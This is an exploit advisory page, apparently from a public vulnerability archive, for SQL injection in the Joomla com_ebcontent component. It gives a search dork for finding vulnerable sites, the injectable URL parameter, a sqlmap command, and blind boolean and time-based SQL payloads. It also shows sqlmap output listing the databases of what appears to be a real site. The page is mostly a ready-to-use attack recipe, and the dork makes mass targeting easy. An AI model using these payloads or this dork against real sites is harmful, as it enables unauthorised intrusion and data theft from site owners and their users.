Joomla com_ebcontent SQL injection

2015.11.01

Credit: Đầu Lâu

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: inurl:option=com_ebcontent

Title: exploit joomla com_ebcontent SQL injection
Author: Đầu Lâu
Date:16/10/2015
Test on: kali linux
Hompage: dont have
Version: all version
Dork:
inurl:option=com_ebcontent
Vuln:
http://site.com/index.php?option=com_ebcontent&view=article&tmpl=component&id=sql injection&cid=9&print=
POC:
sqlmap -u "http://xxx/mma/index.php?option=com_ebcontent&view=article&id=37*&cid=29&Itemid=129&lang=vn" --dbs
sqlmap identified the following injection point(s) with a total of 57 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://xxx:80/mma/index.php?option=com_ebcontent&view=article&id=37' AND 7599=7599 AND 'gefD'='gefD&cid=29&Itemid=129&lang=vn
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://xxx:80/mma/index.php?option=com_ebcontent&view=article&id=37' AND (SELECT * FROM (SELECT(SLEEP(5)))mbyz) AND 'dIwT'='dIwT&cid=29&Itemid=129&lang=vn
---
available databases [3]:
[*] ebrand_mma
[*] information_schema
[*] test

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla com_ebcontent SQL injection

Dork: inurl:option=com_ebcontent

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.